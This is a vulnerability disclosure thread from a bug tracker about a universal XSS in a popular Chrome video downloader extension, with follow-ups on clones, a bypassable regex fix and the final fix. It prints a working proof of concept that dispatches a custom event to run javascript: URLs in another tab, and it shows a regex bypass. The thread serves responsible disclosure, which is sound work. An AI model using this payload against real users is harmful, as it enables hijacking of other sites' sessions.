New issue
Advanced search Search tips
Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Apr 5
Cc:



Sign in to add a comment

Video Downloader Extension: Universal XSS

Project Member Reported by taviso@google.com, Mar 28

Issue description

Browsing through the list of most popular Chrome extensions, I noticed this extension with 4M users:

https://chrome.google.com/webstore/detail/video-downloader-professi/elicpjhcidhpjomhibiffojpinpmmpil?hl=en

It has a pretty obvious universal XSS (i.e. it effectively lets any site take over any other site).

Any website can do this:

// Change the active tab
window.open("https://google.com");

// Run code in the new tab
setTimeout('document.dispatchEvent(new CustomEvent("link64_msgAddLinks", {detail: {type: "__L64_NAVIGATE_CHROME_URL", url: "javascript:alert(document.title);window.close()"}}))', 1000);

That will run arbitrary code on google.com.

I reported this bug to the cws team.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member

Comment 1 by taviso@google.com, Mar 29

The cws has disabled new installs and notified the developer.

I noticed this doesn't work on Firefox, it turns out they block navigations to javascript URLs.

https://dxr.mozilla.org/mozilla-central/source/toolkit/components/extensions/ExtensionUtils.jsm#631

I think we should do that too, so I filed a chrome bug.

https://bugs.chromium.org/p/chromium/issues/detail?id=827288
Project Member

Comment 2 by taviso@google.com, Mar 29

There was a clone of the extension with another 1 million users here:

https://chrome.google.com/webstore/detail/video-downloader-professi/kmdldgcmokdpmacblnehppgkjphcbpnn

I notified the CWS team (grrrr).
Project Member

Comment 3 by taviso@google.com, Apr 4

The author uploaded a new version, but the fix is not good enough. The fix was to only allow the events on websites that match a complicated RegEx.


    if (!document.location.href.match(new RegExp("(https?://)?(www\\.)?(yotu\\.be/|youtube\\.com/)?((.+/)?(watch(\\?v=|.+&v=))?(v=)?)([\\w_-]{11})(&.+)?"))) {
        return;
    }



1. The regex is not anchored, and too many components are optional, so any website can use it.

Example: http://www.example.com/#watch?v=AAAAAAAAAAA matches the RegEx.

> "http://www.example.com/#watch?v=AAAAAAAAAAA".match(new RegExp("(https?://)?(www\\.)?(yotu\\.be/|youtube\\.com/)?((.+/)?(watch(\\?v=|.+&v=))?(v=)?)([\\w_-]{11})(&.+)?"))
(11) ["watch?v=AAAAAAAAAAA", ...]

2. Even if it was anchored and less components were optional, it allows http, so all users with this extension basically have no ssl.

I suggested the author verifies document.location.protocol is https, and then checks document.location.hostname.endsWith(".youtube.com"), avoiding RegEx if possible.

For example:

if (document.location.protocol != "https:" || !document.location.hostname.endsWith(".youtube.com"))
    return; // Not Allowed

Project Member

Comment 4 by taviso@google.com, Apr 5

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
The author pushed a version with a good quality fix, and the cws team have reinstated the extension. Fixed in < 7days!

Sign in to add a comment